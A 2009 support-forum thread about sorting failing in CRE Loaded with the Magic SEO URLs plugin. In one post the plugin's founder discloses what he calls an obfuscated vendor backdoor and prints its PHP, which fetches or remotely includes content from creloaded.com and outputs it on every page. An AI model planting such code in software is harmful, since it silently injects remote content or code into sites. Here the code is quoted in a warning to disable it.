[CRE Loaded] Sort Url does not work

Technical difficulties? Ask for help here.

[CRE Loaded] Sort Url does not work

Postby alex8119574 » Thu Aug 27, 2009 10:22 pm

Creloaded sort by price, name does not work on categories
alex8119574
 
Posts: 4
Joined: Mon Jun 01, 2009 6:19 pm

Re: [CRE Loaded] Sort Url does not work

Postby ~J~ » Fri Aug 28, 2009 9:37 am

What is your web site URL? Please also post how to reproduce the problem on your web site.
~J~
Become a Fan of Magic SEO URLs on Facebook.com to get Discount coupons every month!
~J~
Magic SEO URL Founder
 
Posts: 835
Joined: Sat Feb 02, 2008 4:07 pm
Location: Prague, Central Europe

Re: [CRE Loaded] Sort Url does not work

Postby alex8119574 » Sun Aug 30, 2009 10:58 pm

removed

Sort by price does not work
Last edited by alex8119574 on Sun Sep 06, 2009 4:23 am, edited 1 time in total.
alex8119574
 
Posts: 4
Joined: Mon Jun 01, 2009 6:19 pm

Re: [CRE Loaded] Sort Url does not work

Postby ~J~ » Mon Aug 31, 2009 2:38 pm

I was unable to reproduce this problem. Can you please post me phpinfo() output? I guess it does not work due to Suhosin Patch included in PHP (it breaks PHP core).
~J~
Become a Fan of Magic SEO URLs on Facebook.com to get Discount coupons every month!
~J~
Magic SEO URL Founder
 
Posts: 835
Joined: Sat Feb 02, 2008 4:07 pm
Location: Prague, Central Europe

Re: [CRE Loaded] Sort Url does not work

Postby ~J~ » Wed Sep 02, 2009 7:41 pm

Thanks for PM me phpinfo() output. I did a deep investigation and it seems that this problem is reproducible on x86_64 PHP installations. If I didn't make a major mistake during tests, there is a buffer leak with variables in callback functions. This type of PHP bug can not be worked around at script.
All I can do for you now is to recommend you to upgrade PHP to the latest possible version and same with ZO.
~J~
Become a Fan of Magic SEO URLs on Facebook.com to get Discount coupons every month!
~J~
Magic SEO URL Founder
 
Posts: 835
Joined: Sat Feb 02, 2008 4:07 pm
Location: Prague, Central Europe

Re: [CRE Loaded] Sort Url does not work

Postby ~J~ » Wed Sep 02, 2009 7:48 pm

It is also good to know that during the tests I found there is new slightly modified backdoors in CRE Loaded 6.4 added by Chain Reaction Ecommerce. Normally we don't care about the host application code for MSU, but side affect here is very poor performance.

I recommend to all CRE users to open includes/application_bottom.php file and comment out following line:

Code: Select all
cre_uregisterBasicFunctions();


It does not unregister anything, it just initialize little bit obfuscated Chain Reaction Ecommerce backdoors, cre_uregisterBasicFunctions() function code is:

Code: Select all
if(function_exists("curl_init") &&  function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){
function cre_uregisterBasicFunctions(){$ch = curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, 'http://www.creloaded.com/cre_google.js.html');curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$file_contents = curl_exec($ch);curl_close($ch);echo $file_contents;}
} else {function cre_uregisterBasicFunctions(){@include('http://www.creloaded.com/cre_google.js.html');}}
~J~
Become a Fan of Magic SEO URLs on Facebook.com to get Discount coupons every month!
~J~
Magic SEO URL Founder
 
Posts: 835
Joined: Sat Feb 02, 2008 4:07 pm
Location: Prague, Central Europe

Re: [CRE Loaded] Sort Url does not work

Postby alex8119574 » Sun Sep 06, 2009 4:22 am

Thanks for the help. I am using the latest PHP 5.2.10. Will see when 5.3 comes to cpanel. Have you checked this under 5.3?
alex8119574
 
Posts: 4
Joined: Mon Jun 01, 2009 6:19 pm

Re: [CRE Loaded] Sort Url does not work

Postby ~J~ » Sun Sep 06, 2009 9:37 am

I haven't tested it under 5.3.
~J~
Become a Fan of Magic SEO URLs on Facebook.com to get Discount coupons every month!
~J~
Magic SEO URL Founder
 
Posts: 835
Joined: Sat Feb 02, 2008 4:07 pm
Location: Prague, Central Europe

Re: [CRE Loaded] Sort Url does not work

Postby mike » Tue Dec 08, 2009 2:49 pm

Hi Jiri,
I'm having the same problem. I've asked Hostgator to upgrade my PHP to the latest cPanel supported version, which is PHP 5.2.11, and they've done it, but that hasn't helped.
To reproduce the problem, go to http://www.angelsin.co.uk/shop/ and select a "Department/sub dept." from the left panel until you see the product listing, then click on "Price" to sort products by price, and that's when the error happens. When sorting by price from the "What's New" page http://www.angelsin.co.uk/shop/new-products/ or a "Shop by Price" page http://www.angelsin.co.uk/shop/shop_by_ ... hp?range=0 the link seems to work fine???
I hope this can help you identify the problem as I don't want to have to disable MSU which is doing a great job.
Please let me know if you need more info or loggin details. Thanks.
mike
 
Posts: 2
Joined: Tue Dec 08, 2009 10:56 am

Re: [CRE Loaded] Sort Url does not work

Postby mike » Tue Apr 27, 2010 12:46 pm

Hi Jiri, it's been a while since my last post and I've been looking for a solution to this problem with no success. I still don't understand why the sorting works on some pages and not on others as explained in my previous post. If it's a PHP bug, then shouldn't it affect the whole thing as opposed to certain pages only?
Please help :(
Thanks
mike
 
Posts: 2
Joined: Tue Dec 08, 2009 10:56 am


Return to Troubleshooting

Who is online

Registered users: Google [Bot], MSN [Bot], Yahoo [Bot]